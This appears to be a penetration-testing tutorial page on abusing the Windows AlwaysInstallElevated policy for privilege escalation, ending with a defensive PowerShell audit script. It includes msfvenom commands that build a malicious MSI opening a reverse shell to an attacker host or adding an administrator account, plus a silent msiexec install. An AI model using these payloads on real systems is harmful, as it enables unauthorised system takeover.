AlwaysInstallElevated
MITRE ATT&CK™ System Binary Proxy Execution: Msiexec - Technique T1218.007
Theory
The AlwaysInstallElevated policy lets ALL users on a Windows operating system install an MSI package file with elevated (system) privileges.
Practice
If the policy is enabled, the value AlwaysInstallElevated is created and set to 0x1 (enabled) under the following two registry keys. Impacket's reg.py (Python) script can be used to query the registry remotely from a UNIX-like machine.
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated
Manual verification of this setting is very simple and can be done with two commands.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Alternatively, using PowerUp from PowerSploit we can enumerate the AlwaysInstallElevated policy.
. .\PowerUp.ps1
Invoke-AllChecks
Alternatively, use the systeminfo module of winPEAS.
winPEASx64.exe systeminfo
We just have to generate a malicious MSI file and install it with msiexec.exe.
Generate a malicious MSI
# Reverse Shell
v4resk㉿kali$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f msi > package.msi
# Add user to Administrators
v4resk㉿kali$ msfvenom -p windows/exec CMD='net localgroup administrators <YOUR_USER> /add' -f msi > package.msi
Then, after downloading it to the target, install the MSI file using msiexec.
msiexec.exe /quiet /qn /i package.msi
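For auditing a host against the two registry keys listed under Practice, the following PowerShell sketch is an added example (not code from this page, PowerUp or winPEAS). It reads the machine value and the value in every loaded user hive, and relies on the fact that Windows Installer only elevates when both the HKLM and the per-user value are 1; the function names Get-AieValue and Test-AlwaysInstallElevated are hypothetical.

```powershell
# Added example: report the AlwaysInstallElevated state for the machine
# and for each user hive currently loaded under HKEY_USERS.
# Run elevated to be able to read other users' hives.
$SubKey    = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$ValueName = 'AlwaysInstallElevated'

function Get-AieValue {
    param([Parameter(Mandatory)][string]$RegistryPath)
    # Returns the DWORD, or $null when the key or the value does not exist.
    $item = Get-ItemProperty -Path $RegistryPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$ValueName
}

function Test-AlwaysInstallElevated {
    $machine = Get-AieValue "Registry::HKEY_LOCAL_MACHINE\$SubKey"

    # HKCU is per user: walk the loaded account hives (S-1-5-21-...),
    # skipping the *_Classes hives and the built-in service accounts.
    $hives = Get-ChildItem 'Registry::HKEY_USERS' |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' }

    foreach ($hive in $hives) {
        $user = Get-AieValue "Registry::HKEY_USERS\$($hive.PSChildName)\$SubKey"
        [pscustomobject]@{
            Sid          = $hive.PSChildName
            MachineValue = $machine
            UserValue    = $user
            # The policy takes effect only when both values are 1.
            Effective    = ($machine -eq 1 -and $user -eq 1)
        }
    }
}

Test-AlwaysInstallElevated | Format-Table -AutoSize
```

Any row with Effective set to True identifies an account for which the policy should be disabled, normally by correcting the Group Policy that sets it rather than by editing the registry by hand.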
